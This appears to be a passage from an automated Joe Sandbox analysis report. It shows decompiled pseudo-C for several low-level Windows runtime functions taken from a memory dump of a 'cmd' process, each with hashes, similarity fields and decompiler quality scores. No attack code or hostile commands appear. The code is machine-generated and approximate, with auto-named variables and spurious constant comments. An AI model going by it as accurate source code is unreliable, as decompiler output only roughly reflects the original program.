                                                                                                                                          • Opcode ID: bf88fe92e8c928216cbc3a3c1a7fdcc9943defd1755554d4b8a4149a942f471a
                                                                                                                                          • Instruction ID: bcaa18b08d557b0aff65522a9481ff48f8271d9fb77d7d3d706402beb9d055f9
                                                                                                                                          • Opcode Fuzzy Hash: bf88fe92e8c928216cbc3a3c1a7fdcc9943defd1755554d4b8a4149a942f471a
                                                                                                                                          • Instruction Fuzzy Hash: 64414C319041665FC755CB6EC8A06BABFF5EF8920AB0E41A6D881EF242DA35C956C370
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C9EA55 Relevance: .1, Instructions: 111COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                          			E03C9EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E03BF2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E03C9E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E03BDF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E03BEFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E03C9AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E03C9BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E03BF7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E03C8FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E03BEFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E03C9A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                                                                                          0x03c9ea55
                                                                                                                                          0x03c9ea66
                                                                                                                                          0x03c9ea68
                                                                                                                                          0x03c9ea6c
                                                                                                                                          0x03c9ea6f
                                                                                                                                          0x03c9ea72
                                                                                                                                          0x03c9ea75
                                                                                                                                          0x03c9ea7a
                                                                                                                                          0x03c9ea7a
                                                                                                                                          0x03c9ea7e
                                                                                                                                          0x03c9ea80
                                                                                                                                          0x03c9ea85
                                                                                                                                          0x03c9ea8b
                                                                                                                                          0x03c9eab5
                                                                                                                                          0x03c9eabc
                                                                                                                                          0x03c9eabf
                                                                                                                                          0x03c9eabf
                                                                                                                                          0x03c9eaca
                                                                                                                                          0x03c9eace
                                                                                                                                          0x03c9ead0
                                                                                                                                          0x03c9eae4
                                                                                                                                          0x03c9eaeb
                                                                                                                                          0x03c9eaf0
                                                                                                                                          0x03c9eaf5
                                                                                                                                          0x03c9eb09
                                                                                                                                          0x03c9eb0d
                                                                                                                                          0x03c9eb1d
                                                                                                                                          0x03c9eb2d
                                                                                                                                          0x03c9eb38
                                                                                                                                          0x03c9eb3d
                                                                                                                                          0x03c9eb41
                                                                                                                                          0x03c9eb4a
                                                                                                                                          0x03c9eb60
                                                                                                                                          0x03c9eb4c
                                                                                                                                          0x03c9eb52
                                                                                                                                          0x03c9eb59
                                                                                                                                          0x03c9eb59
                                                                                                                                          0x03c9eb68
                                                                                                                                          0x03c9eb71
                                                                                                                                          0x03c9eb71
                                                                                                                                          0x03c9ea8d
                                                                                                                                          0x03c9ea8f
                                                                                                                                          0x03c9ea92
                                                                                                                                          0x03c9ea97
                                                                                                                                          0x03c9ea97
                                                                                                                                          0x03c9ea9b
                                                                                                                                          0x03c9ea9c
                                                                                                                                          0x03c9ea9e
                                                                                                                                          0x03c9eaa6
                                                                                                                                          0x03c9eaa6
                                                                                                                                          0x03c9eb7e

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                                          • Instruction ID: c8eca163f3d794e42c564c04f79a6b088a7d0cc24d8895e948ec7ad047ed932f
                                                                                                                                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                                          • Instruction Fuzzy Hash: 9031E3366047059BDB19DF24C884A6BB7A9FFC0710F06496EE552CB640DE30E905C795
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C569A6 Relevance: .1, Instructions: 108COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                          			E03C569A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x3ccd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03BE6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03C56BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03C19980() >= 0) {
							E03BF2280(_t56, 0x3cc8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3cc8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3cc8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E03BDB6F0(0x3bbc338, 0x3bbc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03C19520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E03C195D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E03BEFFB0(_t68, _t77, 0x3cc8778);
				}
				_pop(_t78);
				return E03C1B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                                                                          0x03c569b5
                                                                                                                                          0x03c569be
                                                                                                                                          0x03c569c3
                                                                                                                                          0x03c569c9
                                                                                                                                          0x03c569cc
                                                                                                                                          0x03c569d1
                                                                                                                                          0x03c569d3
                                                                                                                                          0x03c569de
                                                                                                                                          0x03c569e1
                                                                                                                                          0x03c569ea
                                                                                                                                          0x03c569f6
                                                                                                                                          0x03c569fe
                                                                                                                                          0x03c56a13
                                                                                                                                          0x03c56a14
                                                                                                                                          0x03c56a15
                                                                                                                                          0x03c56a16
                                                                                                                                          0x03c56a1e
                                                                                                                                          0x03c56a26
                                                                                                                                          0x03c56a31
                                                                                                                                          0x03c56a36
                                                                                                                                          0x03c56a37
                                                                                                                                          0x03c56a40
                                                                                                                                          0x03c56a49
                                                                                                                                          0x03c56a4a
                                                                                                                                          0x03c56a53
                                                                                                                                          0x03c56a59
                                                                                                                                          0x03c56a5d
                                                                                                                                          0x03c56a5e
                                                                                                                                          0x03c56a64
                                                                                                                                          0x03c56a67
                                                                                                                                          0x03c56a6a
                                                                                                                                          0x03c56a6d
                                                                                                                                          0x03c56a70
                                                                                                                                          0x03c56a77
                                                                                                                                          0x03c56a7d
                                                                                                                                          0x03c56a86
                                                                                                                                          0x03c56a89
                                                                                                                                          0x03c56a9c
                                                                                                                                          0x03c56a9f
                                                                                                                                          0x03c56aa2
                                                                                                                                          0x03c56aa5
                                                                                                                                          0x03c56aaf
                                                                                                                                          0x03c56ab1
                                                                                                                                          0x03c56ab8
                                                                                                                                          0x03c56ab9
                                                                                                                                          0x03c56abb
                                                                                                                                          0x03c56abe
                                                                                                                                          0x03c56ac5
                                                                                                                                          0x03c56ac5
                                                                                                                                          0x03c56aaf
                                                                                                                                          0x03c56a40
                                                                                                                                          0x03c56a26
                                                                                                                                          0x03c569fe
                                                                                                                                          0x03c56ace
                                                                                                                                          0x03c56ad0
                                                                                                                                          0x03c56ad3
                                                                                                                                          0x03c56ad8
                                                                                                                                          0x03c56adf
                                                                                                                                          0x03c56adf
                                                                                                                                          0x03c56ae8
                                                                                                                                          0x03c56aef
                                                                                                                                          0x03c56aef
                                                                                                                                          0x03c56af9
                                                                                                                                          0x03c56b06

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6506e237cf63e80f0dff072f1739d8ffbbc9d0f1b3a22557e9c7101ba9fad0e1
                                                                                                                                          • Instruction ID: 3b9063ffc0023b77a4f5a2061e44d3097e160ac4a4203370bb0d1d6d6175ecfe
                                                                                                                                          • Opcode Fuzzy Hash: 6506e237cf63e80f0dff072f1739d8ffbbc9d0f1b3a22557e9c7101ba9fad0e1
                                                                                                                                          • Instruction Fuzzy Hash: 31415BB5E003089FDB14DFA4C840BEEBBF8EF48718F08816AE814EB250DB709945DB54
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BD5210 Relevance: .1, Instructions: 107COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                          			E03BD5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E03BD52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E03C195D0();
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E03BEEB70(_t54, 0x3cc79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E03C195D0();
								L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E03BEEB70(_t54, 0x3cc79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E03C1F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E03BEEB70(_t54, 0x3cc79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E03C195D0();
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                                                                          0x03bd5220
                                                                                                                                          0x03bd5224
                                                                                                                                          0x03c30d13
                                                                                                                                          0x03c30d16
                                                                                                                                          0x03c30d19
                                                                                                                                          0x03bd522a
                                                                                                                                          0x03bd522a
                                                                                                                                          0x03bd522d
                                                                                                                                          0x03bd522d
                                                                                                                                          0x03bd5231
                                                                                                                                          0x03bd5235
                                                                                                                                          0x03bd5239
                                                                                                                                          0x03c30d5c
                                                                                                                                          0x03c30d62
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c30d6a
                                                                                                                                          0x03c30d7b
                                                                                                                                          0x03c30d7f
                                                                                                                                          0x03c30d81
                                                                                                                                          0x03c30d84
                                                                                                                                          0x03c30d95
                                                                                                                                          0x03c30d95
                                                                                                                                          0x03c30d6c
                                                                                                                                          0x03c30d71
                                                                                                                                          0x03c30d71
                                                                                                                                          0x03c30d9a
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd524a
                                                                                                                                          0x03bd524a
                                                                                                                                          0x03bd5250
                                                                                                                                          0x03c30d24
                                                                                                                                          0x03c30d35
                                                                                                                                          0x03c30d39
                                                                                                                                          0x03c30d3b
                                                                                                                                          0x03c30d3e
                                                                                                                                          0x03c30d50
                                                                                                                                          0x03c30d50
                                                                                                                                          0x03c30d26
                                                                                                                                          0x03c30d2b
                                                                                                                                          0x03c30d2b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c30d55
                                                                                                                                          0x03bd5256
                                                                                                                                          0x03bd525b
                                                                                                                                          0x03bd5265
                                                                                                                                          0x03c30da7
                                                                                                                                          0x03bd526b
                                                                                                                                          0x03bd526e
                                                                                                                                          0x03bd5272
                                                                                                                                          0x03c30db1
                                                                                                                                          0x03c30db4
                                                                                                                                          0x03c30dc5
                                                                                                                                          0x03c30dc5
                                                                                                                                          0x03bd5272
                                                                                                                                          0x03bd5278
                                                                                                                                          0x03bd527e
                                                                                                                                          0x03bd528a
                                                                                                                                          0x03bd528c
                                                                                                                                          0x03bd528d
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd5280
                                                                                                                                          0x03bd5282
                                                                                                                                          0x03bd5288
                                                                                                                                          0x03bd529f
                                                                                                                                          0x03bd5292
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd5292
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd5288
                                                                                                                                          0x03bd527e

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3fe92da52b9bc46c158ab6c63385da3bc7efa23cd79b7eaec8ba24fd7073bd9e
                                                                                                                                          • Instruction ID: 234b167039f5f5a5d672952cc44aa6b4ad68585c2b17ffa81b61098f18cf427a
                                                                                                                                          • Opcode Fuzzy Hash: 3fe92da52b9bc46c158ab6c63385da3bc7efa23cd79b7eaec8ba24fd7073bd9e
                                                                                                                                          • Instruction Fuzzy Hash: D331D332A51710AFC731EB28CC81B76B7A5EF02764F1546AAE416DF5A0EB70E904DAD0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0A61C Relevance: .1, Instructions: 106COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E03C0A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x3cb0220);
				E03C2D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3cc7b9c; // 0x0
				_t55 = L03BF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E03C2D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3cc7b10 =  *0x3cc7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x3cc536c; // 0x3472f88
					if( *_t51 != 0x3cc5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3cc5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x3cc536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E03C0A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                                                                          0x03c0a61c
                                                                                                                                          0x03c0a61e
                                                                                                                                          0x03c0a623
                                                                                                                                          0x03c0a628
                                                                                                                                          0x03c0a62b
                                                                                                                                          0x03c0a62d
                                                                                                                                          0x03c0a648
                                                                                                                                          0x03c0a64a
                                                                                                                                          0x03c0a64f
                                                                                                                                          0x03c49b44
                                                                                                                                          0x03c0a6ec
                                                                                                                                          0x03c0a6f1
                                                                                                                                          0x03c0a6f1
                                                                                                                                          0x03c0a655
                                                                                                                                          0x03c0a657
                                                                                                                                          0x03c0a65a
                                                                                                                                          0x03c0a65d
                                                                                                                                          0x03c0a662
                                                                                                                                          0x03c0a663
                                                                                                                                          0x03c0a667
                                                                                                                                          0x03c0a668
                                                                                                                                          0x03c0a66d
                                                                                                                                          0x03c0a706
                                                                                                                                          0x03c0a706
                                                                                                                                          0x03c49bda
                                                                                                                                          0x03c49be6
                                                                                                                                          0x03c49beb
                                                                                                                                          0x00000000
                                                                                                                                          0x03c49beb
                                                                                                                                          0x03c0a679
                                                                                                                                          0x03c49b7a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c49b7a
                                                                                                                                          0x03c0a683
                                                                                                                                          0x03c0a6f4
                                                                                                                                          0x03c0a6f7
                                                                                                                                          0x03c0a6f9
                                                                                                                                          0x03c0a6fd
                                                                                                                                          0x03c0a6a0
                                                                                                                                          0x03c0a6a0
                                                                                                                                          0x03c0a6ad
                                                                                                                                          0x03c0a6af
                                                                                                                                          0x03c0a6b4
                                                                                                                                          0x03c49ba7
                                                                                                                                          0x03c49bac
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c49bc6
                                                                                                                                          0x03c49bce
                                                                                                                                          0x03c49bd1
                                                                                                                                          0x03c49bd3
                                                                                                                                          0x03c49bd3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c49bd1
                                                                                                                                          0x03c0a6bd
                                                                                                                                          0x03c0a6c3
                                                                                                                                          0x03c0a6c6
                                                                                                                                          0x03c0a6d2
                                                                                                                                          0x03c0a701
                                                                                                                                          0x03c0a704
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0a704
                                                                                                                                          0x03c0a6d4
                                                                                                                                          0x03c0a6d6
                                                                                                                                          0x03c0a6d9
                                                                                                                                          0x03c0a6db
                                                                                                                                          0x03c0a6e1
                                                                                                                                          0x03c0a6e6
                                                                                                                                          0x03c0a6e8
                                                                                                                                          0x03c0a6e8
                                                                                                                                          0x03c0a6ea
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0a6ea
                                                                                                                                          0x03c0a688
                                                                                                                                          0x03c0a692
                                                                                                                                          0x03c0a694
                                                                                                                                          0x03c0a699
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0a69d
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1f6aa38dc1c7fd4a2a3fbc2d17cc44d3a909df6c5b0d12032010fc9189f19762
                                                                                                                                          • Instruction ID: 31b8757a9f094be131da6e1c0baeeaf463af2a9613266df1dc4691e5a8a835ca
                                                                                                                                          • Opcode Fuzzy Hash: 1f6aa38dc1c7fd4a2a3fbc2d17cc44d3a909df6c5b0d12032010fc9189f19762
                                                                                                                                          • Instruction Fuzzy Hash: EF4155B9A10355DFCB14CF59C890B9ABBF1FB89304F1981A9E804EF384CB74A941CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C13D43 Relevance: .1, Instructions: 106COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C13D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03BE7B60(0, _t61, 0x3bb11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03BE7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03BF4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                                                          0x03c13d4c
                                                                                                                                          0x03c13d50
                                                                                                                                          0x03c13d55
                                                                                                                                          0x03c13d5e
                                                                                                                                          0x03c4e79a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4e79a
                                                                                                                                          0x03c13d68
                                                                                                                                          0x03c4e789
                                                                                                                                          0x03c13d9d
                                                                                                                                          0x03c13da3
                                                                                                                                          0x03c13daf
                                                                                                                                          0x03c13db5
                                                                                                                                          0x03c13dbc
                                                                                                                                          0x03c13dc4
                                                                                                                                          0x03c13dc9
                                                                                                                                          0x03c13dce
                                                                                                                                          0x03c4e7ae
                                                                                                                                          0x03c4e7ae
                                                                                                                                          0x03c13dde
                                                                                                                                          0x03c13de2
                                                                                                                                          0x03c13de7
                                                                                                                                          0x03c13e0d
                                                                                                                                          0x03c13e13
                                                                                                                                          0x03c13e16
                                                                                                                                          0x03c13e1e
                                                                                                                                          0x03c13e25
                                                                                                                                          0x03c13e28
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13e2a
                                                                                                                                          0x03c13e2f
                                                                                                                                          0x03c13e37
                                                                                                                                          0x03c13e37
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13e37
                                                                                                                                          0x03c13e31
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13e31
                                                                                                                                          0x03c13e20
                                                                                                                                          0x03c13e20
                                                                                                                                          0x03c13e35
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13de9
                                                                                                                                          0x03c13de9
                                                                                                                                          0x03c13de9
                                                                                                                                          0x03c13dee
                                                                                                                                          0x03c13dfd
                                                                                                                                          0x03c13dff
                                                                                                                                          0x03c13e02
                                                                                                                                          0x03c13e05
                                                                                                                                          0x03c13e05
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13df0
                                                                                                                                          0x03c13de7
                                                                                                                                          0x03c4e78f
                                                                                                                                          0x03c4e794
                                                                                                                                          0x03c13d79
                                                                                                                                          0x03c13d84
                                                                                                                                          0x03c13d89
